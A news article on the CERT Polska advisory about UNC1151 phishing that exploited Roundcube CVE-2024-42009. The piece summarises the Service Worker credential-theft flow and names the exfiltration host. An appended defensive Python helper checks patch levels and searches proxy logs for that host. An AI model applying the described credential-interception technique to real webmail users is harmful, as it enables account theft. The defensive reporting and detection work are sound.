
CERT Polska has sounded the alarm after uncovering a spear phishing campaign that targeted Polish organizations using a critical webmail vulnerability. The campaign is linked to the UNC1151 APT group, previously tied to Belarusian and Russian intelligence services, and marks the first recorded use of CVE-2024-42009 by the group.
The attack capitalized on a cross-site scripting (XSS) vulnerability in the popular webmail client Roundcube. The flaw, CVE-2024-42009, allows attackers to inject arbitrary JavaScript into a victim’s browser simply by opening a malicious email, requiring no additional user interaction.
“The worst possible result of running untrusted code is a complete compromise of user's session and/or credentials,” CERT Polska warns.
The malicious message appeared to be a benign request:
But hidden within the HTML structure of the email was obfuscated JavaScript that initiated the exploit.
Once opened, the email triggers a script that installs a Service Worker in the victim’s browser—a powerful web feature that allows background tasks and request interception.
“After successfully installing the Service Worker in a victim’s browser, the user is then redirected to the legitimate webmail login page of their organization,” the advisory explains.
The Service Worker then executes a credential-stealing script by intercepting POST requests sent during a legitimate login process:
Stolen credentials are quietly exfiltrated to attacker-controlled infrastructure, while the user remains unaware.
This operation is attributed with high confidence to UNC1151, an APT threat cluster previously linked to Belarusian military intelligence. Reports by Mandiant and Google have long associated UNC1151 with psychological operations and cyberespionage in Eastern Europe.
“According to publications by Mandiant and Google, UNC1151 is associated with the Belarusian government while other sources connect it with Russian intelligence services.”
Once credentials were harvested, attackers accessed mailboxes, exfiltrated address books, and in some cases, used compromised accounts to propagate further phishing.
Although not exploited in this campaign, CERT Polska warns of a new Roundcube vulnerability, CVE-2025-49113, disclosed last week. It could enable remote code execution when chained with the XSS-based credential theft, raising the stakes for any unpatched server.
“It could be combined with an account compromise vulnerability to form a highly effective attack chain.”
Organizations using Roundcube are urged to take immediate action:
- Update Roundcube to version 1.6.11 or 1.5.10
- Audit logs for connections to a.mpk-krakow[.]pl
- Unregister malicious Service Workers via browser developer tools
- Enforce password resets for potentially compromised users
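As an added example (not code from the CERT Polska advisory or this article), a small Python helper for two of the steps above: checking a Roundcube version against the minimum versions listed, and pulling requests to the published indicator host out of a proxy access log, grouped by client so those users can be prioritized for password resets. The Squid-style log format and the sample log lines are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Values taken from the advisory summary above: the exfiltration host (written
# defanged there) and the minimum Roundcube versions per branch.
INDICATOR_DEFANGED = "a.mpk-krakow[.]pl"
MIN_VERSIONS = {(1, 6): (1, 6, 11), (1, 5): (1, 5, 10)}

def refang(ioc: str) -> str:
    """Turn the defanged form 'a.mpk-krakow[.]pl' into a matchable hostname."""
    return ioc.replace("[.]", ".")

def is_patched(version: str) -> bool:
    """True if a Roundcube version meets the minimum recommended for its branch."""
    v = tuple(int(p) for p in version.strip().split("."))
    branch = v[:2]
    if branch in MIN_VERSIONS:
        return v >= MIN_VERSIONS[branch]
    # Assumption: branches newer than 1.6 are fine, branches older than 1.5 are not.
    return v > (1, 6, 11)

# Squid-style access log: ts elapsed client code/status bytes method url ...
# (assumed format; adjust the regex for your proxy).
LOG_RE = re.compile(
    r"^(?P<ts>\d+\.\d+)\s+\d+\s+(?P<client>\S+)\s+\S+\s+\d+\s+(?P<method>\S+)\s+(?P<url>\S+)"
)

def find_indicator_hits(log_text: str, indicator: str = refang(INDICATOR_DEFANGED)) -> dict:
    """Return {client: [(timestamp, method, url), ...]} for requests whose URL
    host is exactly the indicator; these clients are candidates for a reset."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines in another format rather than guessing
        host = urlsplit(m["url"]).hostname
        if host and host.lower() == indicator.lower():
            hits[m["client"]].append((float(m["ts"]), m["method"], m["url"]))
    return dict(hits)

# Constructed sample log lines, not real traffic: one client posts twice to the
# indicator host, the others only reach ordinary destinations.
SAMPLE_PROXY_LOG = """\
1749200000.123 120 10.0.5.17 TCP_MISS/200 512 POST https://a.mpk-krakow.pl/c - HIER_DIRECT/203.0.113.10 text/plain
1749200005.456 80 10.0.5.42 TCP_MISS/200 2048 GET https://webmail.example.pl/?_task=mail - HIER_DIRECT/198.51.100.7 text/html
1749200010.789 100 10.0.5.17 TCP_MISS/200 300 POST https://a.mpk-krakow.pl/c - HIER_DIRECT/203.0.113.10 text/plain
1749200020.000 90 10.0.5.99 TCP_MISS/200 700 GET https://cdn.example.net/app.js - HIER_DIRECT/198.51.100.9 application/javascript
"""
```

Running `find_indicator_hits(SAMPLE_PROXY_LOG)` on the constructed log returns only client 10.0.5.17 with its two POSTs; feed it your own proxy export after adjusting `LOG_RE`.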